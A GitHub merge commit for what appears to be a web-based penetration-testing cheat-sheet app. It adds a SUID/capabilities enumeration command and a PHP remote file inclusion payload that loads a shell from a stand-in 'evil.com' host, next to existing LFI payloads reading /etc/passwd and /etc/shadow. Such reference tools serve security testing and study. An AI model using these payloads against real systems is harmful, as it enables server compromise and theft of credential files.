Merge pull request #102 from Itsnexn/master

Add getcap and RFI Payload
LasCC · May 28, 2021 · 655f178 · 655f178
2 parents d73df82 + 49ff878
commit 655f178
Show file tree

Hide file tree

Showing 2 changed files with 35 additions and 1 deletion.
diff --git a/src/components/Linux_Shell/LinuxCommands.js b/src/components/Linux_Shell/LinuxCommands.js
@@ -8,7 +8,8 @@ export default (props) => {
 		{ title: 'find / -user root -perm /4000 2>/dev/null' },
 		{ title: 'find / -perm -u=s -type f 2>/dev/null' },
 		{ title: "find / -type f -name '*.txt' 2>/dev/null" },
-		{ title: 'find / -user root -perm -4000 -exec ls -ldb {}; > /tmp/suid' }
+		{ title: 'find / -user root -perm -4000 -exec ls -ldb {}; > /tmp/suid' },
+		{ title: 'getcap -r / 2>/dev/null'}		
 	];
 	const VersionSystem = [
 		{ title: 'cat /etc/issue' },

diff --git a/src/components/web/LFI.js b/src/components/web/LFI.js
@@ -16,6 +16,7 @@ export default (props) => {
 	const directoryTraversal = `foo.php?file=../../../../../../../etc/passwd`;
 	const phpWrapperLfi = `/example1.php?page=expect://ls`;
 	const phpWrapperFilter = `/example1.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd`;
+	const phpRfi = `http://example.com/index.php?page=http://evil.com/shell.txt`;
 	const linux = [
 		{ title: '/etc/passwd' },
 		{ title: '/etc/shadow' },
@@ -171,6 +172,38 @@ export default (props) => {
 					padding: 15,
 					marginTop: 15
 				}}
+			>
+				<Title level={3}>PHP Wrapper php://filter</Title>
+				<Paragraph copyable ellipsis={true}>
+					{phpRfi}
+				</Paragraph>
+				<Clipboard component='a' data-clipboard-text={phpRfi}>
+					<Button
+						type='primary'
+						onClick={message.success('Your RFI payload has been copied')}
+						style={{ marginBottom: 10, marginTop: 15 }}
+					>
+						<CopyOutlined />
+						Copy the payload
+					</Button>
+				</Clipboard>
+				<Clipboard component='a' data-clipboard-text={encodeURI(phpRfi)}>
+					<Button
+						type='dashed'
+						onClick={message.success('Your RFI payload URL encoded has been copied')}
+						style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
+					>
+						<LinkOutlined /> URL encoded
+					</Button>
+				</Clipboard>
+			</div>
+			<Divider dashed />
+			<div
+				key='e'
+				style={{
+					padding: 15,
+					marginTop: 15
+				}}
 			>
 				<Title level={3}>Useful LFI files</Title>
 				<Title level={4}>Linux</Title>